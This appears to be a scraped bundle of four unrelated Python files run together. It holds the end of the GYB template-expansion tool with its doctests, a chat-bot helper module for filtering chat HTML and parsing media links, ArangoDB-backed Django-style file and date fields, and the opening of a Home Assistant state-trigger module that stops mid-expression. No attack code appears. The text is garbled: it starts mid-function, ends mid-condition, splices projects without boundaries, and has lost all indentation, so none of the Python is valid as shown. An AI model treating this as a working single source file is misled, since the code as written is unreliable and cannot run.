last_token_text, last_token_kind = None, None
unmatched_indents = []
dedents = 0
try:
for token_kind, token_text, token_start, \
(token_end_line, token_end_col), line_text \
in tokenize.generate_tokens(lambda i=iter(source_lines):
next(i)):
if token_kind in (tokenize.COMMENT, tokenize.ENDMARKER):
continue
if token_text == '\n' and last_token_text == ':':
unmatched_indents.append(token_end_line)
# The tokenizer appends dedents at EOF; don't consider
# those as matching indentations. Instead just save them
# up...
if last_token_kind == tokenize.DEDENT:
dedents += 1
# And count them later, when we see something real.
if token_kind != tokenize.DEDENT and dedents > 0:
unmatched_indents = unmatched_indents[:-dedents]
dedents = 0
last_token_text, last_token_kind = token_text, token_kind
except tokenize.TokenError:
# Let the later compile() call report the error
return []
if last_token_text == ':':
unmatched_indents.append(len(source_lines))
return unmatched_indents
def code_starts_with_dedent_keyword(source_lines):
r"""Return True iff the incoming Python source_lines begin with "else",
"elif", "except", or "finally".
Initial comments and whitespace are ignored.
>>> code_starts_with_dedent_keyword(split_lines('if x in y: pass'))
False
>>> code_starts_with_dedent_keyword(split_lines('except ifSomethingElse:'))
True
>>> code_starts_with_dedent_keyword(
... split_lines('\n# comment\nelse: # yes'))
True
"""
token_text = None
for token_kind, token_text, _, _, _ \
in tokenize.generate_tokens(lambda i=iter(source_lines): next(i)):
if token_kind != tokenize.COMMENT and token_text.strip() != '':
break
return token_text in ('else', 'elif', 'except', 'finally')
class ParseContext(object):
"""State carried through a parse of a template"""
filename = ''
template = ''
line_starts = []
code_start_line = -1
code_text = None
tokens = None # The rest of the tokens
close_lines = False
def __init__(self, filename, template=None):
self.filename = os.path.abspath(filename)
if template is None:
with open(filename) as f:
self.template = f.read()
else:
self.template = template
self.line_starts = get_line_starts(self.template)
self.tokens = self.token_generator(tokenize_template(self.template))
self.next_token()
def pos_to_line(self, pos):
return bisect(self.line_starts, pos) - 1
def token_generator(self, base_tokens):
r"""Given an iterator over (kind, text, match) triples (see
tokenize_template above), return a refined iterator over
token_kinds.
Among other adjustments to the elements found by base_tokens,
this refined iterator tokenizes python code embedded in
template text to help determine its true extent. The
expression "base_tokens.send(pos)" is used to reset the index at
which base_tokens resumes scanning the underlying text.
>>> ctx = ParseContext('dummy', '''
... %for x in y:
... % print x
... % end
... literally
... ''')
>>> while ctx.token_kind:
... print((ctx.token_kind, ctx.code_text or ctx.token_text))
... ignored = ctx.next_token()
('literal', '\n')
('gybLinesOpen', 'for x in y:\n')
('gybLines', ' print x\n')
('gybLinesClose', '% end')
('literal', 'literally\n')
>>> ctx = ParseContext('dummy',
... '''Nothing
... % if x:
... % for i in range(3):
... ${i}
... % end
... % else:
... THIS SHOULD NOT APPEAR IN THE OUTPUT
... ''')
>>> while ctx.token_kind:
... print((ctx.token_kind, ctx.code_text or ctx.token_text))
... ignored = ctx.next_token()
('literal', 'Nothing\n')
('gybLinesOpen', 'if x:\n')
('gybLinesOpen', ' for i in range(3):\n')
('substitutionOpen', 'i')
('literal', '\n')
('gybLinesClose', '% end')
('gybLinesOpen', 'else:\n')
('literal', 'THIS SHOULD NOT APPEAR IN THE OUTPUT\n')
>>> ctx = ParseContext('dummy',
... '''% for x in [1, 2, 3]:
... % if x == 1:
... literal1
... % elif x > 1: # add output line here to fix bug
... % if x == 2:
... literal2
... % end
... % end
... % end
... ''')
>>> while ctx.token_kind:
... print((ctx.token_kind, ctx.code_text or ctx.token_text))
... ignored = ctx.next_token()
('gybLinesOpen', 'for x in [1, 2, 3]:\n')
('gybLinesOpen', ' if x == 1:\n')
('literal', 'literal1\n')
('gybLinesOpen', 'elif x > 1: # add output line here to fix bug\n')
('gybLinesOpen', ' if x == 2:\n')
('literal', 'literal2\n')
('gybLinesClose', '% end')
('gybLinesClose', '% end')
('gybLinesClose', '% end')
"""
for self.token_kind, self.token_text, self.token_match in base_tokens:
kind = self.token_kind
self.code_text = None
# Do we need to close the current lines?
self.close_lines = kind == 'gybLinesClose'
# %{...}% and ${...} constructs
if kind.endswith('Open'):
# Tokenize text that follows as Python up to an unmatched '}'
code_start = self.token_match.end(kind)
self.code_start_line = self.pos_to_line(code_start)
close_pos = tokenize_python_to_unmatched_close_curly(
self.template, code_start, self.line_starts)
self.code_text = self.template[code_start:close_pos]
yield kind
if (kind == 'gybBlockOpen'):
# Absorb any '}% <optional-comment> \n'
m2 = gyb_block_close.match(self.template, close_pos)
if not m2:
raise ValueError("Invalid block closure")
next_pos = m2.end(0)
else:
assert kind == 'substitutionOpen'
# skip past the closing '}'
next_pos = close_pos + 1
# Resume tokenizing after the end of the code.
base_tokens.send(next_pos)
elif kind == 'gybLines':
self.code_start_line = self.pos_to_line(
self.token_match.start('gybLines'))
indentation = self.token_match.group('_indent')
# Strip off the leading indentation and %-sign
source_lines = re.split(
'^' + re.escape(indentation),
self.token_match.group('gybLines') + '\n',
flags=re.MULTILINE)[1:]
if code_starts_with_dedent_keyword(source_lines):
self.close_lines = True
last_split = 0
for line in split_gyb_lines(source_lines):
self.token_kind = 'gybLinesOpen'
self.code_text = ''.join(source_lines[last_split:line])
yield self.token_kind
last_split = line
self.code_start_line += line - last_split
self.close_lines = False
self.code_text = ''.join(source_lines[last_split:])
if self.code_text:
self.token_kind = 'gybLines'
yield self.token_kind
else:
yield self.token_kind
def next_token(self):
"""Move to the next token"""
for kind in self.tokens:
return self.token_kind
self.token_kind = None
_default_line_directive = \
'// ###sourceLocation(file: "%(file)s", line: %(line)d)'
class ExecutionContext(object):
"""State we pass around during execution of a template"""
def __init__(self, line_directive=_default_line_directive,
**local_bindings):
self.local_bindings = local_bindings
self.line_directive = line_directive
self.local_bindings['__context__'] = self
self.result_text = []
self.last_file_line = None
def append_text(self, text, file, line):
# see if we need to inject a line marker
if self.line_directive:
if (file, line) != self.last_file_line:
# We can only insert the line directive at a line break
if len(self.result_text) == 0 \
or self.result_text[-1].endswith('\n'):
if sys.platform == 'win32':
file = file.replace('\\', '/')
substitutions = {'file': file, 'line': line + 1}
format_str = self.line_directive + '\n'
self.result_text.append(format_str % substitutions)
# But if the new text contains any line breaks, we can create
# one
elif '\n' in text:
i = text.find('\n')
self.result_text.append(text[:i + 1])
# and try again
self.append_text(text[i + 1:], file, line + 1)
return
self.result_text.append(text)
self.last_file_line = (file, line + text.count('\n'))
class ASTNode(object):
"""Abstract base class for template AST nodes"""
def __init__(self):
raise NotImplementedError("ASTNode.__init__ is not implemented.")
def execute(self, context):
raise NotImplementedError("ASTNode.execute is not implemented.")
def __str__(self, indent=''):
raise NotImplementedError("ASTNode.__str__ is not implemented.")
def format_children(self, indent):
if not self.children:
return ' []'
return '\n'.join(
['', indent + '['] +
[x.__str__(indent + 4 * ' ') for x in self.children] +
[indent + ']'])
class Block(ASTNode):
"""A sequence of other AST nodes, to be executed in order"""
children = []
def __init__(self, context):
self.children = []
while context.token_kind and not context.close_lines:
if context.token_kind == 'literal':
node = Literal
else:
node = Code
self.children.append(node(context))
def execute(self, context):
for x in self.children:
x.execute(context)
def __str__(self, indent=''):
return indent + 'Block:' + self.format_children(indent)
class Literal(ASTNode):
"""An AST node that generates literal text"""
def __init__(self, context):
self.text = context.token_text
start_position = context.token_match.start(context.token_kind)
self.start_line_number = context.pos_to_line(start_position)
self.filename = context.filename
context.next_token()
def execute(self, context):
context.append_text(self.text, self.filename, self.start_line_number)
def __str__(self, indent=''):
return '\n'.join(
[indent + x for x in ['Literal:'] +
strip_trailing_nl(self.text).split('\n')])
class Code(ASTNode):
"""An AST node that is evaluated as Python"""
code = None
children = ()
kind = None
def __init__(self, context):
source = ''
source_line_count = 0
def accumulate_code():
s = source + (context.code_start_line - source_line_count) * '\n' \
+ textwrap.dedent(context.code_text)
line_count = context.code_start_line + \
context.code_text.count('\n')
context.next_token()
return s, line_count
eval_exec = 'exec'
if context.token_kind.startswith('substitution'):
eval_exec = 'eval'
source, source_line_count = accumulate_code()
source = '(' + source.strip() + ')'
else:
while context.token_kind == 'gybLinesOpen':
source, source_line_count = accumulate_code()
source += ' __children__[%d].execute(__context__)\n' % len(
self.children)
source_line_count += 1
self.children += (Block(context),)
if context.token_kind == 'gybLinesClose':
context.next_token()
if context.token_kind == 'gybLines':
source, source_line_count = accumulate_code()
# Only handle a substitution as part of this code block if
# we don't already have some %-lines.
elif context.token_kind == 'gybBlockOpen':
# Opening ${...} and %{...}% constructs
source, source_line_count = accumulate_code()
self.filename = context.filename
self.start_line_number = context.code_start_line
self.code = compile(source, context.filename, eval_exec)
self.source = source
def execute(self, context):
# Save __children__ from the local bindings
save_children = context.local_bindings.get('__children__')
# Execute the code with our __children__ in scope
context.local_bindings['__children__'] = self.children
context.local_bindings['__file__'] = self.filename
result = eval(self.code, context.local_bindings)
if context.local_bindings['__children__'] is not self.children:
raise ValueError("The code is not allowed to mutate __children__")
# Restore the bindings
context.local_bindings['__children__'] = save_children
# If we got a result, the code was an expression, so append
# its value
if result is not None \
or (isinstance(result, basestring) and result != ''):
from numbers import Number, Integral
result_string = None
if isinstance(result, Number) and not isinstance(result, Integral):
result_string = repr(result)
else:
result_string = str(result)
context.append_text(
result_string, self.filename, self.start_line_number)
def __str__(self, indent=''):
source_lines = re.sub(r'^\n', '', strip_trailing_nl(
self.source), flags=re.MULTILINE).split('\n')
if len(source_lines) == 1:
s = indent + 'Code: {' + source_lines[0] + '}'
else:
s = indent + 'Code:\n' + indent + '{\n' + '\n'.join(
indent + 4 * ' ' + l for l in source_lines
) + '\n' + indent + '}'
return s + self.format_children(indent)
def expand(filename, line_directive=_default_line_directive, **local_bindings):
r"""Return the contents of the givepn template file, executed with the given
local bindings.
>>> from tempfile import NamedTemporaryFile
>>> # On Windows, the name of a NamedTemporaryFile cannot be used to open
>>> # the file for a second time if delete=True. Therefore, we have to
>>> # manually handle closing and deleting this file to allow us to open
>>> # the file by its name across all platforms.
>>> f = NamedTemporaryFile(delete=False)
>>> f.write(
... r'''---
... % for i in range(int(x)):
... a pox on ${i} for epoxy
... % end
... ${120 +
...
... 3}
... abc
... ${"w\nx\nX\ny"}
... z
... ''')
>>> f.flush()
>>> result = expand(
... f.name,
... line_directive='//#sourceLocation(file: "%(file)s", ' + \
... 'line: %(line)d)',
... x=2
... ).replace(
... '"%s"' % f.name, '"dummy.file"')
>>> print(result, end='')
//#sourceLocation(file: "dummy.file", line: 1)
---
//#sourceLocation(file: "dummy.file", line: 3)
a pox on 0 for epoxy
//#sourceLocation(file: "dummy.file", line: 3)
a pox on 1 for epoxy
//#sourceLocation(file: "dummy.file", line: 5)
123
//#sourceLocation(file: "dummy.file", line: 8)
abc
w
x
X
y
//#sourceLocation(file: "dummy.file", line: 10)
z
>>> f.close()
>>> os.remove(f.name)
"""
with open(filename) as f:
t = parse_template(filename, f.read())
d = os.getcwd()
os.chdir(os.path.dirname(os.path.abspath(filename)))
try:
return execute_template(
t, line_directive=line_directive, **local_bindings)
finally:
os.chdir(d)
def parse_template(filename, text=None):
r"""Return an AST corresponding to the given template file.
If text is supplied, it is assumed to be the contents of the file,
as a string.
>>> print(parse_template('dummy.file', text=
... '''% for x in [1, 2, 3]:
... % if x == 1:
... literal1
... % elif x > 1: # add output line after this line to fix bug
... % if x == 2:
... literal2
... % end
... % end
... % end
... '''))
Block:
[
Code:
{
for x in [1, 2, 3]:
__children__[0].execute(__context__)
}
[
Block:
[
Code:
{
if x == 1:
__children__[0].execute(__context__)
elif x > 1: # add output line after this line to fix bug
__children__[1].execute(__context__)
}
[
Block:
[
Literal:
literal1
]
Block:
[
Code:
{
if x == 2:
__children__[0].execute(__context__)
}
[
Block:
[
Literal:
literal2
]
]
]
]
]
]
]
>>> print(parse_template(
... 'dummy.file',
... text='%for x in range(10):\n% print(x)\n%end\njuicebox'))
Block:
[
Code:
{
for x in range(10):
__children__[0].execute(__context__)
}
[
Block:
[
Code: {print(x)} []
]
]
Literal:
juicebox
]
>>> print(parse_template('/dummy.file', text=
... '''Nothing
... % if x:
... % for i in range(3):
... ${i}
... % end
... % else:
... THIS SHOULD NOT APPEAR IN THE OUTPUT
... '''))
Block:
[
Literal:
Nothing
Code:
{
if x:
__children__[0].execute(__context__)
else:
__children__[1].execute(__context__)
}
[
Block:
[
Code:
{
for i in range(3):
__children__[0].execute(__context__)
}
[
Block:
[
Code: {(i)} []
Literal:
<BLANKLINE>
]
]
]
Block:
[
Literal:
THIS SHOULD NOT APPEAR IN THE OUTPUT
]
]
]
>>> print(parse_template('dummy.file', text='''%
... %for x in y:
... % print(y)
... '''))
Block:
[
Code:
{
for x in y:
__children__[0].execute(__context__)
}
[
Block:
[
Code: {print(y)} []
]
]
]
>>> print(parse_template('dummy.file', text='''%
... %if x:
... % print(y)
... AAAA
... %else:
... BBBB
... '''))
Block:
[
Code:
{
if x:
__children__[0].execute(__context__)
else:
__children__[1].execute(__context__)
}
[
Block:
[
Code: {print(y)} []
Literal:
AAAA
]
Block:
[
Literal:
BBBB
]
]
]
>>> print(parse_template('dummy.file', text='''%
... %if x:
... % print(y)
... AAAA
... %# This is a comment
... %else:
... BBBB
... '''))
Block:
[
Code:
{
if x:
__children__[0].execute(__context__)
# This is a comment
else:
__children__[1].execute(__context__)
}
[
Block:
[
Code: {print(y)} []
Literal:
AAAA
]
Block:
[
Literal:
BBBB
]
]
]
>>> print(parse_template('dummy.file', text='''\
... %for x in y:
... AAAA
... %if x:
... BBBB
... %end
... CCCC
... '''))
Block:
[
Code:
{
for x in y:
__children__[0].execute(__context__)
}
[
Block:
[
Literal:
AAAA
Code:
{
if x:
__children__[0].execute(__context__)
}
[
Block:
[
Literal:
BBBB
]
]
Literal:
CCCC
]
]
]
"""
return Block(ParseContext(filename, text))
def execute_template(
ast, line_directive=_default_line_directive, **local_bindings):
r"""Return the text generated by executing the given template AST.
Keyword arguments become local variable bindings in the execution context
>>> root_directory = os.path.abspath('/')
>>> file_name = root_directory + 'dummy.file'
>>> ast = parse_template(file_name, text=
... '''Nothing
... % if x:
... % for i in range(3):
... ${i}
... % end
... % else:
... THIS SHOULD NOT APPEAR IN THE OUTPUT
... ''')
>>> out = execute_template(ast,
... line_directive='//#sourceLocation(file: "%(file)s", line: %(line)d)',
... x=1)
>>> out = out.replace(file_name, "DUMMY-FILE")
>>> print(out, end="")
//#sourceLocation(file: "DUMMY-FILE", line: 1)
Nothing
//#sourceLocation(file: "DUMMY-FILE", line: 4)
0
//#sourceLocation(file: "DUMMY-FILE", line: 4)
1
//#sourceLocation(file: "DUMMY-FILE", line: 4)
2
>>> ast = parse_template(file_name, text=
... '''Nothing
... % a = []
... % for x in range(3):
... % a.append(x)
... % end
... ${a}
... ''')
>>> out = execute_template(ast,
... line_directive='//#sourceLocation(file: "%(file)s", line: %(line)d)',
... x=1)
>>> out = out.replace(file_name, "DUMMY-FILE")
>>> print(out, end="")
//#sourceLocation(file: "DUMMY-FILE", line: 1)
Nothing
//#sourceLocation(file: "DUMMY-FILE", line: 6)
[0, 1, 2]
>>> ast = parse_template(file_name, text=
... '''Nothing
... % a = []
... % for x in range(3):
... % a.append(x)
... % end
... ${a}
... ''')
>>> out = execute_template(ast,
... line_directive='#line %(line)d "%(file)s"', x=1)
>>> out = out.replace(file_name, "DUMMY-FILE")
>>> print(out, end="")
#line 1 "DUMMY-FILE"
Nothing
#line 6 "DUMMY-FILE"
[0, 1, 2]
"""
execution_context = ExecutionContext(
line_directive=line_directive, **local_bindings)
ast.execute(execution_context)
return ''.join(execution_context.result_text)
def main():
"""
Lint this file.
>>> import sys
>>> gyb_path = os.path.realpath(__file__).replace('.pyc', '.py')
>>> sys.path.append(os.path.dirname(gyb_path))
>>> import python_lint
>>> python_lint.lint([gyb_path], verbose=False)
0
"""
import argparse
import sys
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='Generate Your Boilerplate!', epilog='''
A GYB template consists of the following elements:
- Literal text which is inserted directly into the output
- %% or $$ in literal text, which insert literal '%' and '$'
symbols respectively.
- Substitutions of the form ${<python-expression>}. The Python
expression is converted to a string and the result is inserted
into the output.
- Python code delimited by %{...}%. Typically used to inject
definitions (functions, classes, variable bindings) into the
evaluation context of the template. Common indentation is
stripped, so you can add as much indentation to the beginning
of this code as you like
- Lines beginning with optional whitespace followed by a single
'%' and Python code. %-lines allow you to nest other
constructs inside them. To close a level of nesting, use the
"%end" construct.
- Lines beginning with optional whitespace and followed by a
single '%' and the token "end", which close open constructs in
%-lines.
Example template:
- Hello -
%{
x = 42
def succ(a):
return a+1
}%
I can assure you that ${x} < ${succ(x)}
% if int(y) > 7:
% for i in range(3):
y is greater than seven!
% end
% else:
y is less than or equal to seven
% end
- The End. -
When run with "gyb -Dy=9", the output is
- Hello -
I can assure you that 42 < 43
y is greater than seven!
y is greater than seven!
y is greater than seven!
- The End. -
'''
)
parser.add_argument(
'-D', action='append', dest='defines', metavar='NAME=VALUE',
default=[],
help='''Bindings to be set in the template's execution context''')
parser.add_argument(
'file', type=argparse.FileType(),
help='Path to GYB template file (defaults to stdin)', nargs='?',
default=sys.stdin)
parser.add_argument(
'-o', dest='target', type=argparse.FileType('w'),
help='Output file (defaults to stdout)', default=sys.stdout)
parser.add_argument(
'--test', action='store_true',
default=False, help='Run a self-test')
parser.add_argument(
'--verbose-test', action='store_true',
default=False, help='Run a verbose self-test')
parser.add_argument(
'--dump', action='store_true',
default=False, help='Dump the parsed template to stdout')
parser.add_argument(
'--line-directive',
default=_default_line_directive,
help='''
Line directive format string, which will be
provided 2 substitutions, `%%(line)d` and `%%(file)s`.
Example: `// #sourceLocation(file: "%%(file)s", line: %%(line)d)`
''')
args = parser.parse_args(sys.argv[1:])
if args.test or args.verbose_test:
import doctest
selfmod = sys.modules[__name__]
if doctest.testmod(selfmod, verbose=args.verbose_test or None).failed:
sys.exit(1)
bindings = dict(x.split('=', 1) for x in args.defines)
ast = parse_template(args.file.name, args.file.read())
if args.dump:
print(ast)
# Allow the template to open files and import .py files relative to its own
# directory
os.chdir(os.path.dirname(os.path.abspath(args.file.name)))
sys.path = ['.'] + sys.path
args.target.write(execute_template(ast, args.line_directive, **bindings))
if __name__ == '__main__':
main()
| |
import re
import time
import codecs
import xml
import requests
import json
from bs4 import BeautifulSoup
from requests.models import PreparedRequest
import requests.exceptions
def checkrank(num):
def getrank(func):
def wrapper(self, cirno, username, args):
rank = cirno.userdict[username]['rank']
if rank >= num:
return func(self, cirno, username, args)
return wrapper
return getrank
def throttle(num):
def counter(func):
def wrapper(self, cirno, username, args):
last = time.time()
if username not in cirno.cmdthrottle:
cirno.cmdthrottle[username] = last
return func(self, cirno, username, args)
else:
data = time.time() - cirno.cmdthrottle[username]
cirno.cmdthrottle[username] = time.time()
if data >= num:
return func(self, cirno, username, args)
return wrapper
return counter
def filterchat(msg):
msg = re.sub("'", "'", msg)
msg = re.sub("&", "&", msg)
msg = re.sub("<", "<", msg)
msg = re.sub(">", ">", msg)
msg = re.sub(""", "\"", msg)
msg = re.sub("(", "(", msg)
msg = re.sub(")", ")", msg)
if 'img class="chat-picture"' in msg:
return filter_images(msg)
msg = re.sub("^[ \t]+", "", msg)
msg = remove_tags(msg)
return msg
def filter_images(msg):
try:
cmd = msg.split(' ')[0]
matches = re.search('src="([^"]+)"', msg)
return "%s %s" % (cmd, matches.group(1))
except:
return msg
def remove_tags(msg):
tag = re.compile('<[^>]+>')
return tag.sub('', msg)
def updatesettings(cirno):
try:
cirno.settings = readsettings()
except:
writesettings(cirno)
def check_picture(pic):
r = requests.get(pic)
if r.url == "https://i.imgur.com/removed.png" or r.status_code == 404:
return False
else:
return True
def check_allowed_sources(cirno, source):
domain = re.search('src="(https?://)?(.+?)(\/.*)"', source).group(2)
if domain in cirno.allowed_sources:
return True
else:
return False
def check_url(url):
prepared_request = PreparedRequest()
try:
prepared_request.prepare_url(url, None)
return True
except requests.exceptions.MissingSchema:
return False
def writesettings(cirno):
with codecs.open('settings.json', 'w', 'utf8') as f:
f.write(json.dumps(cirno.settings, ensure_ascii=False))
def readsettings():
data = codecs.open('settings.json', 'r', 'utf-8')
result = json.load(data)
return result
def parsemedialink(url):
if type(url) is not str:
return {
'id': None,
'type': None
}
elif url.startswith('jw:'):
return {
'id': url[3:],
'type': "jw"
}
elif url.startswith('rtmp://'):
return {
'id': url,
'type': "rt"
}
elif 'youtube.com' in url:
m = re.search(r'(https?://)?(www\.)?(youtube|youtu)'
r'\.(com|be)/(watch\?v=|v/)?([^&#]+)', url)
return {
'id': m.group(6),
'type': 'yt'
}
elif 'google.com/file' in url:
m = re.search(r'(docs.google.com|drive.google.com)'
'/(file/d)/([^/]*)', url)
return {
'id': m.group(3),
'type': 'gd'
}
elif 'google.com/open' in url:
m = re.search(r'(docs.google.com|drive.google.com)'
'/(.+?id=)?([^&#]+)', url)
return {
'id': m.group(3),
'type': 'gd'
}
elif 'twitch.tv' in url:
m = re.search(r'(https?://)?(twitch.tv)/([^&#]+)', url)
return {
'id': m.group(3),
'type': 'tw'
}
elif 'livestream.com' in url:
m = re.search(r'(https?://)?(livestream.com)/([^&#]+)', url)
return {
'id': m.group(3),
'type': 'li'
}
elif 'ustream.tv' in url:
m = re.search(r'(https?://)?(ustream.tv)/([^&#]+)', url)
return {
'id': m.group(3),
'type': 'us'
}
elif 'vimeo.com' in url:
m = re.search(r'(https?://)?(vimeo.com)/([^&#]+)', url)
return {
'id': m.group(3),
'type': 'vi'
}
elif 'dailymotion.com' in url:
m = re.search(r'(https?://)?(dailymotion.com/video)/([^&#]+)', url)
return {
'id': m.group(3),
'type': 'dm'
}
elif 'vid.me' in url:
m = re.search(r'(https?://)?(vid.me)/([^&#]+)', url)
return {
'id': m.group(3),
'type': 'vm'
}
elif 'streamable.com' in url:
m = re.search(r'(https?://)?(streamable.com)/([^&#]+)', url)
return {
'id': m.group(3),
'type': 'sb'
}
elif url.endswith(".m3u8"):
return {
'id': url,
'type': 'hl'
}
elif 'soundcloud.com' in url:
return {
'id': url,
'type': 'sc'
}
else:
return {
'id': None,
'type': None
}
| |
import os
from datetime import datetime, date
from django.core.files.base import File
from django.core.files.storage import default_storage
from django.conf import settings
from django.utils.encoding import force_str, force_text
from django.utils import timezone
from django.utils.translation import ugettext as _
from django.db.models.fields.files import FileDescriptor
from arangodb.orm.fields import TextField, BooleanField, DateField, DatetimeField
import collections
class FieldFile(File):
def __init__(self, instance, field, name):
super(FieldFile, self).__init__(None, name)
self.instance = instance
self.field = field
self.storage = field.storage
self._committed = True
def __eq__(self, other):
# Older code may be expecting FileField values to be simple strings.
# By overriding the == operator, it can remain backwards compatibility.
if hasattr(other, 'name'):
return self.name == other.name
return self.name == other
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.name)
# The standard File contains most of the necessary properties, but
# FieldFiles can be instantiated without a name, so that needs to
# be checked for here.
def _require_file(self):
if not self:
raise ValueError("The '%s' attribute has no file associated with it." % self.field.name)
def _get_file(self):
self._require_file()
if not hasattr(self, '_file') or self._file is None:
self._file = self.storage.open(self.name, 'rb')
return self._file
def _set_file(self, file):
self._file = file
def _del_file(self):
del self._file
file = property(_get_file, _set_file, _del_file)
def _get_path(self):
self._require_file()
return self.storage.path(self.name)
path = property(_get_path)
def _get_url(self):
self._require_file()
return self.storage.url(self.name)
url = property(_get_url)
def _get_size(self):
self._require_file()
if not self._committed:
return self.file.size
return self.storage.size(self.name)
size = property(_get_size)
def open(self, mode='rb'):
self._require_file()
self.file.open(mode)
# open() doesn't alter the file's contents, but it does reset the pointer
open.alters_data = True
# In addition to the standard File API, FieldFiles have extra methods
# to further manipulate the underlying file, as well as update the
# associated model instance.
def save(self, name, content, save=True):
# name = self.field.generate_filename(self.instance, name)
self.name = self.storage.save(name, content)
setattr(self.instance, self.field.name, self.name)
# Update the filesize cache
self._size = content.size
self._committed = True
# Save the object because it has changed, unless save is False
if save:
self.instance.save()
save.alters_data = True
def delete(self, save=True):
if not self:
return
# Only close the file if it's already open, which we know by the
# presence of self._file
if hasattr(self, '_file'):
self.close()
del self.file
self.storage.delete(self.name)
self.name = None
setattr(self.instance, self.field.name, self.name)
# Delete the filesize cache
if hasattr(self, '_size'):
del self._size
self._committed = False
if save:
self.instance.save()
delete.alters_data = True
def _get_closed(self):
file = getattr(self, '_file', None)
return file is None or file.closed
closed = property(_get_closed)
def close(self):
file = getattr(self, '_file', None)
if file is not None:
file.close()
def __getstate__(self):
# FieldFile needs access to its associated model field and an instance
# it's attached to in order to work properly, but the only necessary
# data to be pickled is the file's name itself. Everything else will
# be restored later, by FileDescriptor below.
return {'name': self.name, 'closed': False, '_committed': True, '_file': None}
class FileField(TextField):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_cls = FieldFile
# The descriptor to use for accessing the attribute off of the class.
descriptor_class = FileDescriptor
def __init__(self, upload_to='', storage=None, **kwargs):
"""
"""
super(FileField, self).__init__(**kwargs)
self.file_name = None
self.storage = storage or default_storage
self.upload_to = upload_to
if isinstance(upload_to, collections.Callable):
self.generate_filename = upload_to
def create_file_instance(self, model_instance):
"""
"""
self.file = self.attr_cls(instance=model_instance, field=self, name=self.file_name)
def on_save(self, model_instance):
"""
"""
self.create_file_instance(model_instance)
file = self.file
# This was reset
if self.file_name == self.content_file:
return
if file:
# Commit the file to storage prior to saving the model
file.save(file.name, self.content_file, save=False)
def get(self):
"""
"""
return self.file_name
def set(self, *args, **kwargs):
"""
"""
if len(args) is 1:
value = args[0]
self.content_file = value
if not '/' in value:
self.file_name = self.generate_filename(self, value)
else:
self.file_name = value
def dumps(self):
"""
"""
return self.file.path
def loads(self, string_val):
"""
"""
self.file_name = string_val
def validate(self):
"""
"""
super(FileField, self).validate()
def get_directory_name(self):
return os.path.normpath(force_text(datetime.now().strftime(force_str(self.upload_to))))
def get_filename(self, filename):
return os.path.normpath(self.storage.get_valid_name((filename)))
def generate_filename(self, instance, filename):
return os.path.join(self.get_directory_name(), self.get_filename(filename))
class DjangoBooleanField(BooleanField):
flatchoices = (
(False, _('False')),
(True, _('True')),
)
def __getattribute__(self, item):
"""
"""
if item == 'choices':
return True
else:
return super(BooleanField, self).__getattribute__(item)
class DjangoDateField(DateField):
"""
Can be timezone aware
"""
def __init__(self, **kwargs):
"""
"""
super(DjangoDateField, self).__init__(**kwargs)
if self.null and not self.default:
self.date = None
else:
if self.default:
self.date = self.default
else:
if getattr(settings, 'USE_TZ', False):
self.date = timezone.now().date()
else:
self.date = date.today()
class DjangoTimeField(DatetimeField):
"""
Can be timezone aware
"""
def __init__(self, **kwargs):
"""
"""
super(DjangoTimeField, self).__init__(**kwargs)
if self.null and not self.default:
self.time = None
else:
if self.default:
self.time = self.default
else:
if getattr(settings, 'USE_TZ', False):
self.time = timezone.now()
else:
self.time = datetime.now()
| |
"""Offer state listening automation rules."""
from __future__ import annotations
from datetime import timedelta
import logging
from typing import Any
import voluptuous as vol
from homeassistant import exceptions
from homeassistant.const import CONF_ATTRIBUTE, CONF_FOR, CONF_PLATFORM, MATCH_ALL
from homeassistant.core import CALLBACK_TYPE, HassJob, HomeAssistant, State, callback
from homeassistant.helpers import config_validation as cv, template
from homeassistant.helpers.event import (
Event,
async_track_same_state,
async_track_state_change_event,
process_state_match,
)
# mypy: allow-incomplete-defs, allow-untyped-calls, allow-untyped-defs
# mypy: no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
CONF_ENTITY_ID = "entity_id"
CONF_FROM = "from"
CONF_TO = "to"
BASE_SCHEMA = {
vol.Required(CONF_PLATFORM): "state",
vol.Required(CONF_ENTITY_ID): cv.entity_ids,
vol.Optional(CONF_FOR): cv.positive_time_period_template,
vol.Optional(CONF_ATTRIBUTE): cv.match_all,
}
TRIGGER_STATE_SCHEMA = vol.Schema(
{
**BASE_SCHEMA,
# These are str on purpose. Want to catch YAML conversions
vol.Optional(CONF_FROM): vol.Any(str, [str]),
vol.Optional(CONF_TO): vol.Any(str, [str]),
}
)
TRIGGER_ATTRIBUTE_SCHEMA = vol.Schema(
{
**BASE_SCHEMA,
vol.Optional(CONF_FROM): cv.match_all,
vol.Optional(CONF_TO): cv.match_all,
}
)
def TRIGGER_SCHEMA(value: Any) -> dict: # pylint: disable=invalid-name
"""Validate trigger."""
if not isinstance(value, dict):
raise vol.Invalid("Expected a dictionary")
# We use this approach instead of vol.Any because
# this gives better error messages.
if CONF_ATTRIBUTE in value:
return TRIGGER_ATTRIBUTE_SCHEMA(value)
return TRIGGER_STATE_SCHEMA(value)
async def async_attach_trigger(
hass: HomeAssistant,
config,
action,
automation_info,
*,
platform_type: str = "state",
) -> CALLBACK_TYPE:
"""Listen for state changes based on configuration."""
entity_id = config.get(CONF_ENTITY_ID)
from_state = config.get(CONF_FROM, MATCH_ALL)
to_state = config.get(CONF_TO, MATCH_ALL)
time_delta = config.get(CONF_FOR)
template.attach(hass, time_delta)
match_all = from_state == MATCH_ALL and to_state == MATCH_ALL
unsub_track_same = {}
period: dict[str, timedelta] = {}
match_from_state = process_state_match(from_state)
match_to_state = process_state_match(to_state)
attribute = config.get(CONF_ATTRIBUTE)
job = HassJob(action)
trigger_id = automation_info.get("trigger_id") if automation_info else None
_variables = {}
if automation_info:
_variables = automation_info.get("variables") or {}
@callback
def state_automation_listener(event: Event):
"""Listen for state changes and calls action."""
entity: str = event.data["entity_id"]
from_s: State | None = event.data.get("old_state")
to_s: State | None = event.data.get("new_state")
if from_s is None:
old_value = None
elif attribute is None:
old_value = from_s.state
else:
old_value = from_s.attributes.get(attribute)
if to_s is None:
new_value = None
elif attribute is None:
new_value = to_s.state
else:
new_value = to_s.attributes.get(attribute)
# When we listen for state changes with `match_all`, we
# will trigger even if just an attribute changes. When
# we listen to just an attribute, we should ignore all
# other attribute changes.
if attribute is not None and old_value == new_value:
return
if (
not match_from_state(old_value)
or not match_to_state(new_value)
